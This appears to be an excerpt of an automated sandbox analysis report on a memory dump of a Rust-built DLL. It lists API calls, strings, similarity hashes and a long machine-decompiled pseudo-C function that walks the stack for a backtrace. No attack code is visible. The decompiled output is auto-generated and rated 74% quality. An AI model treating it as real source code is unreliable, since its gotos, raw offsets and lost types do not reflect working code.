                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID: RUST_BACKTRACE
                          • API String ID: 1617791916-3454309823
                          • Opcode ID: d9343a4f3e07f0cb55fae24e8956e918f32ded61acb9049216a55c8387fb4f8b
                          • Instruction ID: c01adb82c75ca93d703db10a44fd9257aba5bf5ba0561425789a24da622bb3bc
                          • Opcode Fuzzy Hash: d9343a4f3e07f0cb55fae24e8956e918f32ded61acb9049216a55c8387fb4f8b
                          • Instruction Fuzzy Hash: 2F029DB1E042198FDB10CFD8C890BDDBBB2BF49314F154259D629B7284E772A849CFA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECD77B4, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 423COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • called `Option::unwrap()` on a `None` value, xrefs: 6ECD7B7C
                          • bool, xrefs: 6ECD7A4B
                          • ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6ECD77C2, 6ECD7C19
                          • {recursion limit reached}{invalid syntax}, xrefs: 6ECD7DC6
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: __aulldiv__aullrem
                          • String ID: ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$bool$called `Option::unwrap()` on a `None` value${recursion limit reached}{invalid syntax}
                          • API String ID: 3839614884-433696047
                          • Opcode ID: e1d6680d6c0e6715d749601b19ba253eea7f24fabcf4eda1bec78babdb92a2c6
                          • Instruction ID: 45e76d8a603b4da0e64516d2d53cb5b967bb396692e847cc98bb5e372c66f204
                          • Opcode Fuzzy Hash: e1d6680d6c0e6715d749601b19ba253eea7f24fabcf4eda1bec78babdb92a2c6
                          • Instruction Fuzzy Hash: 40E136716087418FD704CFA8C4907AAB7E1AF86314F14866ED9D98B3D6E336E84AD742
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECEAB0C, Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                          Download Yara Rule
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6ECEAB18
                          • IsDebuggerPresent.KERNEL32 ref: 6ECEABE4
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6ECEAC04
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 6ECEAC0E
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                          • String ID:
                          • API String ID: 254469556-0
                          • Opcode ID: 308ebb3e5d79f4b450c791375f22a361e9d408bba3502d2aa61141db9ad58343
                          • Instruction ID: a1d223b398793dcb93bb89a6a2d3e1546bef8ad3a897de42b553315e05fd6e17
                          • Opcode Fuzzy Hash: 308ebb3e5d79f4b450c791375f22a361e9d408bba3502d2aa61141db9ad58343
                          • Instruction Fuzzy Hash: C53129B6D05218DFDF50DFA4D989BCCBBB8AF08304F1044AAE40DAB240EB755A84CF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDDEE0, Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 451memorylibraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E6ECDDEE0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, long _a8) {
				void* _v16;
				char _v1456;
				void* __ebp;
				void _t191;
				void* _t194;
				long _t195;
				signed int _t200;
				void* _t201;
				void* _t204;
				void* _t205;
				long _t206;
				char _t208;
				void* _t217;
				void* _t218;
				void* _t221;
				void* _t227;
				void* _t229;
				void* _t233;
				void* _t235;
				void* _t241;
				void* _t243;
				void* _t244;
				void* _t246;
				void* _t250;
				void* _t252;
				long _t260;
				long _t262;
				void* _t263;
				void* _t264;
				char _t265;
				void* _t267;
				void* _t274;
				void* _t284;
				void* _t288;
				long _t291;
				WCHAR* _t293;
				void* _t294;
				WCHAR* _t304;
				long _t305;
				void* _t307;
				void* _t308;
				intOrPtr _t310;
				intOrPtr _t313;
				signed int _t315;
				intOrPtr _t317;
				void* _t318;
				void* _t322;
				void* _t324;

				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t317 = (_t315 & 0xfffffff0) - 0x5b0;
				_t310 = _t317;
				 *((intOrPtr*)(_t310 + 0x598)) = _t313;
				 *((intOrPtr*)(_t310 + 0x59c)) = _t317;
				 *(_t310 + 0x5a8) = 0xffffffff;
				 *((intOrPtr*)(_t310 + 0x5a4)) = E6ECE3B90;
				 *((intOrPtr*)(_t310 + 0x5a0)) =  *[fs:0x0];
				 *[fs:0x0] = _t310 + 0x5a0;
				_t191 =  *_a4;
				 *(_t310 + 0x28) = _t191;
				 *(_t310 + 0xe) = _t191;
				E6ECEC310(__edi, _t310 + 0x190, 0, 0x400);
				_t318 = _t317 + 0xc;
				_t194 =  *0x6ed1d0bc; // 0x2
				_t262 = 0x200;
				 *(_t310 + 0x24) = 0;
				 *(_t310 + 0x2c) = _t194;
				 *(_t310 + 0x30) = 0;
				 *(_t310 + 0x14) = _t194;
				 *(_t310 + 0x34) = 0;
				 *(_t310 + 0x10) = 0x200;
				if(0x200 >= 0x201) {
					L4:
					_t291 =  *(_t310 + 0x24);
					_t263 = _t262 - _t291;
					__eflags =  *(_t310 + 0x30) - _t291 - _t263;
					if( *(_t310 + 0x30) - _t291 < _t263) {
						 *(_t310 + 0x5a8) = 0;
						_t274 = _t310 + 0x2c;
						E6ECF7370(_t274, _t291, _t263);
						_t318 = _t318 + 4;
						 *(_t310 + 0x14) =  *(_t310 + 0x2c);
					}
					_t262 =  *(_t310 + 0x10);
					_t304 =  *(_t310 + 0x14);
					 *(_t310 + 0x34) = _t262;
					 *(_t310 + 0x24) = _t262;
					 *(_t310 + 0x20) = _t304;
					 *(_t310 + 0x1c) = _t262;
				} else {
					L7:
					_t304 = _t310 + 0x190;
					 *(_t310 + 0x1c) = 0x200;
					 *(_t310 + 0x20) = _t304;
				}
				L8:
				SetLastError(0);
				_t195 = GetCurrentDirectoryW(_t262, _t304);
				_t305 = _t195;
				if(_t195 != 0 || GetLastError() == 0) {
					if(_t305 != _t262 || GetLastError() != 0x7a) {
						__eflags = _t305 -  *(_t310 + 0x10);
						_t262 = _t305;
						if(_t305 <  *(_t310 + 0x10)) {
							_t292 =  *(_t310 + 0x1c);
							 *(_t310 + 0x5a8) = 0;
							__eflags = _t305 -  *(_t310 + 0x1c);
							if(__eflags > 0) {
								E6ECF6DB0(_t262, _t305, _t292, _t305, _t310, __eflags, 0x6ed1ded0);
								goto L70;
							} else {
								_t293 =  *(_t310 + 0x20);
								_t274 = _t310 + 0x70;
								_push(_t305);
								E6ECE0EC0(_t262, _t274, _t293, _t305, _t310);
								_t318 = _t318 + 4;
								asm("movsd xmm0, [esi+0x70]");
								_t264 = 0;
								 *(_t310 + 0x48) =  *(_t310 + 0x78);
								asm("movsd [esi+0x40], xmm0");
								_t200 =  *(_t310 + 0x30);
								__eflags = _t200;
								if(_t200 != 0) {
									goto L18;
								} else {
								}
								goto L21;
							}
						} else {
							__eflags = _t262 - 0x201;
							 *(_t310 + 0x10) = _t262;
							if(_t262 < 0x201) {
								goto L7;
							} else {
								goto L4;
							}
							goto L8;
						}
					} else {
						_t262 =  *(_t310 + 0x10) +  *(_t310 + 0x10);
						 *(_t310 + 0x10) = _t262;
						if(_t262 >= 0x201) {
							goto L4;
						} else {
							goto L7;
						}
						goto L8;
					}
				} else {
					_t260 = GetLastError();
					_t264 = 1;
					 *(_t310 + 0x44) = _t260;
					 *(_t310 + 0x40) = 0;
					_t200 =  *(_t310 + 0x30);
					__eflags = _t200;
					if(_t200 != 0) {
						L18:
						__eflags =  *(_t310 + 0x14);
						if( *(_t310 + 0x14) != 0) {
							__eflags = _t200 & 0x7fffffff;
							if((_t200 & 0x7fffffff) != 0) {
								HeapFree( *0x6ed2adc8, 0,  *(_t310 + 0x14));
							}
						}
					}
					L21:
					__eflags = _t264;
					if(_t264 == 0) {
						_t201 =  *(_t310 + 0x40);
						_t274 =  *(_t310 + 0x44);
						_t293 =  *(_t310 + 0x48);
						_t265 =  *(_t310 + 0x28);
						 *(_t310 + 0x5a8) = 2;
					} else {
						__eflags =  *(_t310 + 0x40) - 3;
						if( *(_t310 + 0x40) == 3) {
							_t288 =  *(_t310 + 0x44);
							 *(_t310 + 0x10) = _t288;
							 *(_t310 + 0x5a8) = 1;
							 *((intOrPtr*)( *((intOrPtr*)(_t288 + 4))))( *_t288);
							_t318 = _t318 + 4;
							_t250 =  *(_t310 + 0x10);
							_t274 =  *(_t250 + 4);
							__eflags =  *(_t274 + 4);
							if( *(_t274 + 4) != 0) {
								_t252 =  *_t250;
								__eflags =  *((intOrPtr*)(_t274 + 8)) - 9;
								if( *((intOrPtr*)(_t274 + 8)) >= 9) {
									_t252 =  *(_t252 - 4);
								}
								HeapFree( *0x6ed2adc8, 0, _t252);
								_t250 =  *(_t310 + 0x44);
							}
							HeapFree( *0x6ed2adc8, 0, _t250);
						}
						_t265 =  *(_t310 + 0xe);
						_t201 = 0;
						 *(_t310 + 0x5a8) = 2;
					}
					 *((char*)(_t310 + 0x68)) = _t265;
					 *(_t310 + 0x5c) = _t201;
					 *(_t310 + 0x64) = _t293;
					 *(_t310 + 0x60) = _t274;
					 *(_t310 + 0x190) = 0x6ed1d5c8;
					 *(_t310 + 0x194) = 1;
					 *(_t310 + 0x198) = 0;
					 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6ed1cd60;
					 *(_t310 + 0x1a4) = 0;
					_t294 =  *(_a8 + 0x1c);
					_push(_t310 + 0x190);
					_t204 = E6ECD2320( *((intOrPtr*)(_a8 + 0x18)), _t294);
					_t322 = _t318 + 4;
					__eflags = _t204;
					if(_t204 != 0) {
						L50:
						_t205 =  *(_t310 + 0x5c);
						__eflags = _t205;
						if(_t205 != 0) {
							__eflags =  *(_t310 + 0x60);
							if( *(_t310 + 0x60) != 0) {
								HeapFree( *0x6ed2adc8, 0, _t205);
							}
						}
						_t206 = 1;
						goto L54;
					} else {
						_t208 =  *(_t310 + 0xe);
						 *(_t310 + 0x6c) = 0;
						 *((char*)(_t310 + 0xf)) = 0;
						 *(_t310 + 0x40) = _a8;
						 *(_t310 + 0x44) = 0;
						__eflags = _t208;
						 *((char*)(_t310 + 0x50)) = _t208;
						 *(_t310 + 0x2c) = _t310 + 0xe;
						 *(_t310 + 0x48) = _t310 + 0x5c;
						 *((intOrPtr*)(_t310 + 0x4c)) = 0x6ed1d5d0;
						 *(_t310 + 0x1b) = _t208 != 0;
						 *(_t310 + 0x30) = _t310 + 0x6c;
						 *(_t310 + 0x34) = _t310 + 0x1b;
						 *((intOrPtr*)(_t310 + 0x38)) = _t310 + 0xf;
						 *((intOrPtr*)(_t310 + 0x3c)) = _t310 + 0x40;
						 *(_t310 + 0x10) = GetCurrentProcess();
						 *(_t310 + 0x24) = GetCurrentThread();
						_t307 = _t310 + 0x190;
						E6ECEC310(_t307, _t307, 0, 0x2d0);
						_t324 = _t322 + 0xc;
						_push(_t307);
						L6ECE9EEE();
						_t217 = E6ECDE690(_t265, _t307, _t310);
						__eflags = _t217;
						if(_t217 == 0) {
							_t308 =  *0x6ed2ade8; // 0x0
							 *(_t310 + 0x58) = _t294;
							__eflags = _t308;
							if(_t308 == 0) {
								_t218 = GetProcAddress( *0x6ed2add0, "SymFunctionTableAccess64");
								__eflags = _t218;
								if(__eflags == 0) {
									 *(_t310 + 0x5a8) = 3;
									E6ECF6E20(_t265, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ed1e2c0);
									goto L70;
								} else {
									_t308 = _t218;
									 *0x6ed2ade8 = _t218;
									_t267 =  *0x6ed2adec; // 0x0
									__eflags = _t267;
									if(_t267 != 0) {
										goto L41;
									} else {
										goto L39;
									}
								}
							} else {
								_t267 =  *0x6ed2adec; // 0x0
								__eflags = _t267;
								if(_t267 != 0) {
									L41:
									 *(_t310 + 0x20) = GetCurrentProcess();
									_t221 =  *0x6ed2adf8; // 0x0
									 *(_t310 + 0x1c) = _t308;
									 *(_t310 + 0x14) = _t267;
									__eflags = _t221;
									if(_t221 != 0) {
										L44:
										 *(_t310 + 0x28) = _t221;
										 *(_t310 + 0x74) = 0;
										 *(_t310 + 0x70) = 0;
										E6ECEC310(_t308, _t310 + 0x80, 0, 0x10c);
										_t324 = _t324 + 0xc;
										 *(_t310 + 0x7c) = 0;
										 *(_t310 + 0x78) =  *(_t310 + 0x248);
										 *(_t310 + 0x84) = 3;
										 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
										 *(_t310 + 0xac) = 0;
										 *(_t310 + 0xb4) = 3;
										 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
										 *(_t310 + 0x9c) = 0;
										 *(_t310 + 0xa4) = 3;
										while(1) {
											_t227 =  *(_t310 + 0x28)(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0, 0);
											__eflags = _t227 - 1;
											if(_t227 != 1) {
												goto L47;
											}
											 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
											 *(_t310 + 0x5a8) = 3;
											_t235 = E6ECDE890(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
											_t308 =  *(_t310 + 0x1c);
											_t267 =  *(_t310 + 0x14);
											__eflags = _t235;
											if(_t235 != 0) {
												continue;
											}
											goto L47;
										}
										goto L47;
									} else {
										_t221 = GetProcAddress( *0x6ed2add0, "StackWalkEx");
										__eflags = _t221;
										if(_t221 == 0) {
											E6ECEC310(_t308, _t310 + 0x80, 0, 0x100);
											_t324 = _t324 + 0xc;
											 *(_t310 + 0x74) = 0;
											 *(_t310 + 0x70) = 1;
											 *(_t310 + 0x188) = 0;
											 *(_t310 + 0x7c) = 0;
											 *(_t310 + 0x78) =  *(_t310 + 0x248);
											 *(_t310 + 0x84) = 3;
											 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
											 *(_t310 + 0xac) = 0;
											 *(_t310 + 0xb4) = 3;
											 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
											 *(_t310 + 0x9c) = 0;
											 *(_t310 + 0xa4) = 3;
											do {
												_t284 =  *0x6ed2ade4; // 0x0
												__eflags = _t284;
												if(_t284 != 0) {
													L63:
													_t241 =  *_t284(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0);
													__eflags = _t241 - 1;
													if(_t241 != 1) {
														L47:
														ReleaseMutex( *(_t310 + 0x58));
														__eflags =  *((char*)(_t310 + 0xf));
														if( *((char*)(_t310 + 0xf)) != 0) {
															goto L50;
														} else {
															goto L48;
														}
														goto L54;
													} else {
														goto L64;
													}
												} else {
													_t244 = GetProcAddress( *0x6ed2add0, "StackWalk64");
													__eflags = _t244;
													if(__eflags == 0) {
														 *(_t310 + 0x5a8) = 3;
														E6ECF6E20(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ed1e2c0);
														goto L70;
													} else {
														_t284 = _t244;
														 *0x6ed2ade4 = _t244;
														goto L63;
													}
												}
												goto L71;
												L64:
												 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
												 *(_t310 + 0x5a8) = 3;
												_t243 = E6ECDE890(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
												_t308 =  *(_t310 + 0x1c);
												_t267 =  *(_t310 + 0x14);
												__eflags = _t243;
											} while (_t243 != 0);
											goto L47;
										} else {
											 *0x6ed2adf8 = _t221;
											goto L44;
										}
									}
								} else {
									L39:
									_t246 = GetProcAddress( *0x6ed2add0, "SymGetModuleBase64");
									__eflags = _t246;
									if(__eflags == 0) {
										 *(_t310 + 0x5a8) = 3;
										E6ECF6E20(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ed1e2c0);
										L70:
										asm("ud2");
										_push(_t313);
										return E6ECDE880( *((intOrPtr*)( &_v1456 + 0x58)));
									} else {
										_t267 = _t246;
										 *0x6ed2adec = _t246;
										goto L41;
									}
								}
							}
						} else {
							__eflags =  *((char*)(_t310 + 0xf));
							if( *((char*)(_t310 + 0xf)) != 0) {
								goto L50;
							} else {
								L48:
								__eflags =  *(_t310 + 0xe);
								if( *(_t310 + 0xe) != 0) {
									L55:
									_t229 =  *(_t310 + 0x5c);
									__eflags = _t229;
									if(_t229 != 0) {
										__eflags =  *(_t310 + 0x60);
										if( *(_t310 + 0x60) != 0) {
											HeapFree( *0x6ed2adc8, 0, _t229);
										}
									}
									_t206 = 0;
								} else {
									 *(_t310 + 0x190) = 0x6ed1d63c;
									 *(_t310 + 0x194) = 1;
									 *(_t310 + 0x198) = 0;
									 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6ed1cd60;
									 *(_t310 + 0x1a4) = 0;
									 *(_t310 + 0x5a8) = 2;
									_push(_t310 + 0x190);
									_t233 = E6ECD2320( *((intOrPtr*)(_a8 + 0x18)),  *(_a8 + 0x1c));
									__eflags = _t233;
									if(_t233 == 0) {
										goto L55;
									} else {
										goto L50;
									}
								}
							}
							L54:
							 *[fs:0x0] =  *((intOrPtr*)(_t310 + 0x5a0));
							return _t206;
						}
					}
				}
				L71:
			}



















































                          0x6ecddee3
                          0x6ecddee4
                          0x6ecddee5
                          0x6ecddee9
                          0x6ecddeef
                          0x6ecddef1
                          0x6ecddef7
                          0x6ecddefd
                          0x6ecddf07
                          0x6ecddf21
                          0x6ecddf27
                          0x6ecddf2e
                          0x6ecddf30
                          0x6ecddf33
                          0x6ecddf44
                          0x6ecddf49
                          0x6ecddf4c
                          0x6ecddf51
                          0x6ecddf56
                          0x6ecddf5d
                          0x6ecddf60
                          0x6ecddf67
                          0x6ecddf6a
                          0x6ecddf77
                          0x6ecddf7a
                          0x6ecddf96
                          0x6ecddf96
                          0x6ecddf9c
                          0x6ecddfa0
                          0x6ecddfa2
                          0x6ecddfa4
                          0x6ecddfae
                          0x6ecddfb2
                          0x6ecddfb7
                          0x6ecddfbd
                          0x6ecddfbd
                          0x6ecddfc0
                          0x6ecddfc3
                          0x6ecddfc6
                          0x6ecddfc9
                          0x6ecddfcc
                          0x6ecddfcf
                          0x6ecddf7c
                          0x6ecddfe0
                          0x6ecddfe0
                          0x6ecddfe6
                          0x6ecddfed
                          0x6ecddfed
                          0x6ecddff0
                          0x6ecddff2
                          0x6ecddffa
                          0x6ecde000
                          0x6ecde004
                          0x6ecde012
                          0x6ecddf80
                          0x6ecddf83
                          0x6ecddf85
                          0x6ecde03d
                          0x6ecde040
                          0x6ecde04a
                          0x6ecde04c
                          0x6ecde568
                          0x00000000
                          0x6ecde052
                          0x6ecde052
                          0x6ecde055
                          0x6ecde058
                          0x6ecde059
                          0x6ecde05e
                          0x6ecde064
                          0x6ecde069
                          0x6ecde06b
                          0x6ecde06e
                          0x6ecde073
                          0x6ecde076
                          0x6ecde078
                          0x00000000
                          0x00000000
                          0x6ecde07a
                          0x00000000
                          0x6ecde078
                          0x6ecddf8b
                          0x6ecddf8b
                          0x6ecddf91
                          0x6ecddf94
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecddf94
                          0x6ecde027
                          0x6ecde02a
                          0x6ecde032
                          0x6ecde035
                          0x00000000
                          0x6ecde03b
                          0x00000000
                          0x6ecde03b
                          0x00000000
                          0x6ecde035
                          0x6ecde07c
                          0x6ecde07c
                          0x6ecde082
                          0x6ecde084
                          0x6ecde087
                          0x6ecde08e
                          0x6ecde091
                          0x6ecde093
                          0x6ecde095
                          0x6ecde095
                          0x6ecde099
                          0x6ecde09b
                          0x6ecde0a0
                          0x6ecde0ad
                          0x6ecde0ad
                          0x6ecde0a0
                          0x6ecde099
                          0x6ecde0b2
                          0x6ecde0b2
                          0x6ecde0b4
                          0x6ecde11e
                          0x6ecde121
                          0x6ecde124
                          0x6ecde127
                          0x6ecde12a
                          0x6ecde0b6
                          0x6ecde0b6
                          0x6ecde0ba
                          0x6ecde0bc
                          0x6ecde0c1
                          0x6ecde0c7
                          0x6ecde0d2
                          0x6ecde0d4
                          0x6ecde0d7
                          0x6ecde0da
                          0x6ecde0dd
                          0x6ecde0e1
                          0x6ecde0e3
                          0x6ecde0e5
                          0x6ecde0e9
                          0x6ecde0eb
                          0x6ecde0eb
                          0x6ecde0f7
                          0x6ecde0fc
                          0x6ecde0fc
                          0x6ecde108
                          0x6ecde108
                          0x6ecde10d
                          0x6ecde110
                          0x6ecde112
                          0x6ecde112
                          0x6ecde134
                          0x6ecde137
                          0x6ecde13d
                          0x6ecde140
                          0x6ecde143
                          0x6ecde14d
                          0x6ecde157
                          0x6ecde161
                          0x6ecde16b
                          0x6ecde178
                          0x6ecde181
                          0x6ecde182
                          0x6ecde187
                          0x6ecde18a
                          0x6ecde18c
                          0x6ecde405
                          0x6ecde405
                          0x6ecde408
                          0x6ecde40a
                          0x6ecde40c
                          0x6ecde410
                          0x6ecde41b
                          0x6ecde41b
                          0x6ecde410
                          0x6ecde420
                          0x00000000
                          0x6ecde192
                          0x6ecde192
                          0x6ecde198
                          0x6ecde19f
                          0x6ecde1a3
                          0x6ecde1a6
                          0x6ecde1ad
                          0x6ecde1af
                          0x6ecde1b8
                          0x6ecde1be
                          0x6ecde1c1
                          0x6ecde1c8
                          0x6ecde1cc
                          0x6ecde1d2
                          0x6ecde1d8
                          0x6ecde1de
                          0x6ecde1e6
                          0x6ecde1ef
                          0x6ecde1f9
                          0x6ecde200
                          0x6ecde205
                          0x6ecde208
                          0x6ecde209
                          0x6ecde20e
                          0x6ecde213
                          0x6ecde215
                          0x6ecde226
                          0x6ecde22c
                          0x6ecde22f
                          0x6ecde231
                          0x6ecde24a
                          0x6ecde250
                          0x6ecde252
                          0x6ecde595
                          0x6ecde5ae
                          0x00000000
                          0x6ecde258
                          0x6ecde258
                          0x6ecde25a
                          0x6ecde25f
                          0x6ecde265
                          0x6ecde267
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecde267
                          0x6ecde233
                          0x6ecde233
                          0x6ecde239
                          0x6ecde23b
                          0x6ecde289
                          0x6ecde28e
                          0x6ecde291
                          0x6ecde296
                          0x6ecde299
                          0x6ecde29c
                          0x6ecde29e
                          0x6ecde2be
                          0x6ecde2be
                          0x6ecde2c7
                          0x6ecde2ce
                          0x6ecde2dd
                          0x6ecde2e2
                          0x6ecde2f7
                          0x6ecde2fe
                          0x6ecde301
                          0x6ecde30b
                          0x6ecde311
                          0x6ecde31b
                          0x6ecde325
                          0x6ecde32b
                          0x6ecde335
                          0x6ecde340
                          0x6ecde35e
                          0x6ecde361
                          0x6ecde364
                          0x00000000
                          0x00000000
                          0x6ecde376
                          0x6ecde37c
                          0x6ecde386
                          0x6ecde38b
                          0x6ecde38e
                          0x6ecde391
                          0x6ecde393
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecde393
                          0x00000000
                          0x6ecde2a0
                          0x6ecde2ab
                          0x6ecde2b1
                          0x6ecde2b3
                          0x6ecde464
                          0x6ecde469
                          0x6ecde47e
                          0x6ecde485
                          0x6ecde48c
                          0x6ecde496
                          0x6ecde49d
                          0x6ecde4a0
                          0x6ecde4aa
                          0x6ecde4b0
                          0x6ecde4ba
                          0x6ecde4c4
                          0x6ecde4ca
                          0x6ecde4d4
                          0x6ecde4e0
                          0x6ecde4e0
                          0x6ecde4e6
                          0x6ecde4e8
                          0x6ecde506
                          0x6ecde522
                          0x6ecde524
                          0x6ecde527
                          0x6ecde395
                          0x6ecde398
                          0x6ecde39d
                          0x6ecde3a1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecde4ea
                          0x6ecde4f5
                          0x6ecde4fb
                          0x6ecde4fd
                          0x6ecde572
                          0x6ecde58b
                          0x00000000
                          0x6ecde4ff
                          0x6ecde4ff
                          0x6ecde501
                          0x00000000
                          0x6ecde501
                          0x6ecde4fd
                          0x00000000
                          0x6ecde52d
                          0x6ecde53d
                          0x6ecde543
                          0x6ecde54d
                          0x6ecde552
                          0x6ecde555
                          0x6ecde558
                          0x6ecde558
                          0x00000000
                          0x6ecde2b9
                          0x6ecde2b9
                          0x00000000
                          0x6ecde2b9
                          0x6ecde2b3
                          0x6ecde23d
                          0x6ecde269
                          0x6ecde274
                          0x6ecde27a
                          0x6ecde27c
                          0x6ecde5b8
                          0x6ecde5d1
                          0x6ecde5d9
                          0x6ecde5d9
                          0x6ecde5e0
                          0x6ecde5fc
                          0x6ecde282
                          0x6ecde282
                          0x6ecde284
                          0x00000000
                          0x6ecde284
                          0x6ecde27c
                          0x6ecde23b
                          0x6ecde217
                          0x6ecde217
                          0x6ecde21b
                          0x00000000
                          0x6ecde221
                          0x6ecde3a3
                          0x6ecde3a3
                          0x6ecde3a7
                          0x6ecde437
                          0x6ecde437
                          0x6ecde43a
                          0x6ecde43c
                          0x6ecde43e
                          0x6ecde442
                          0x6ecde44d
                          0x6ecde44d
                          0x6ecde442
                          0x6ecde452
                          0x6ecde3ad
                          0x6ecde3b0
                          0x6ecde3ba
                          0x6ecde3c4
                          0x6ecde3ce
                          0x6ecde3d8
                          0x6ecde3e2
                          0x6ecde3f8
                          0x6ecde3f9
                          0x6ecde401
                          0x6ecde403
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecde403
                          0x6ecde3a7
                          0x6ecde422
                          0x6ecde428
                          0x6ecde436
                          0x6ecde436
                          0x6ecde215
                          0x6ecde18c
                          0x00000000

                          APIs
                          • SetLastError.KERNEL32(00000000), ref: 6ECDDFF2
                          • GetCurrentDirectoryW.KERNEL32(?,?), ref: 6ECDDFFA
                          • GetLastError.KERNEL32 ref: 6ECDE006
                          • GetLastError.KERNEL32 ref: 6ECDE018
                          • GetLastError.KERNEL32 ref: 6ECDE07C
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6ECDE0AD
                          • HeapFree.KERNEL32(00000000,?), ref: 6ECDE0F7
                          • HeapFree.KERNEL32(00000000,?), ref: 6ECDE108
                          • GetCurrentProcess.KERNEL32(?), ref: 6ECDE1E1
                          • GetCurrentThread.KERNEL32 ref: 6ECDE1E9
                          • RtlCaptureContext.KERNEL32(?), ref: 6ECDE209
                          • GetProcAddress.KERNEL32(SymFunctionTableAccess64,?), ref: 6ECDE24A
                          • GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6ECDE274
                          • GetCurrentProcess.KERNEL32 ref: 6ECDE289
                          • GetProcAddress.KERNEL32(StackWalkEx), ref: 6ECDE2AB
                          • ReleaseMutex.KERNEL32(?), ref: 6ECDE398
                          • HeapFree.KERNEL32(00000000,?), ref: 6ECDE41B
                          • HeapFree.KERNEL32(00000000,?,?), ref: 6ECDE44D
                          • GetProcAddress.KERNEL32(StackWalk64), ref: 6ECDE4F5
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeHeap$AddressCurrentErrorLastProc$Process$CaptureContextDirectoryMutexReleaseThread
                          • String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$called `Option::unwrap()` on a `None` value
                          • API String ID: 1381040140-1036201984
                          • Opcode ID: 4684716b9897f53484347832e253adfa1106237a29cef055a9d3cd590a99d7d4
